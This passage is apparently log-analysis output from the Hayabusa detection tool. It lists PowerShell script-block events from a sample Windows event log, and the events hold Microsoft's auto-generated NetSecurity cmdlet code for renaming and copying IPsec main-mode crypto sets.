([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 